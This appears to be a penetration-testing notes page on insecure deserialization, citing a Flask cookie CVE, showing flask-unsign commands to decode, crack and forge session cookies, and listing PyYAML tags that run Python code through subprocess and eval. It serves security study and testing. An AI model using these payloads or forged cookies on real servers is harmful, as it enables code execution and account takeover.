Insecure Deserialization
Insecure Deserialization is a vulnerability that occurs when the deserialization process can be exploited to run malicious code.
Example CVEs
CVE-2021-33026 (Flask/Python)
An insure deserialization in Flask (Python) allowed a hacker to craft a malicious cookie with a command inside. When the cookie was deserialized, the command was executed by the server.
- Cookies can be read without the secret key
- Cookies can be forged with the secret key
- kirsle flask cookie reader (Website)
- See also: flask-session-manager (0.5k β) or Flask Unsign (0.3k β)
$ pip3 install flask-unsign[wordlist]
$ sudo ln -s /home/<xxx>/.local/bin/flask-unsign /usr/bin/flask-unsign
$ flask-unsign --decode --cookie 'cookie' # decode
$ flask-unsign --unsign --cookie 'cookie' # find key
$ flask-unsign --sign --cookie '' --secret 'dev' # encode
Yaml - Deserialization
PyYAML version 6 and below instanciated by default an insecure parser which could be exploited to run python code.
xxx: !!python/object/apply:time.sleep [2]
The xxx:
is only necessary if a specific element (e.g., xxx) is rendered.
!!python/object/apply:builtins.range [1,10,1]
!!python/object/apply:subprocess.Popen ["ls"]
!!python/object/apply:subprocess.check_output [['ls', '-la']]
!!python/object/apply:builtins.eval [ "5" ]
!!python/object/apply:builtins.eval [ "__import__('subprocess') or 'error'" ]
!!python/object/apply:builtins.eval [ "__import__('subprocess').check_output(['ls', '-l']).decode('utf-8') or 'error'" ]
β‘οΈ See also: python-deserialization-payload-generator (0.08k β).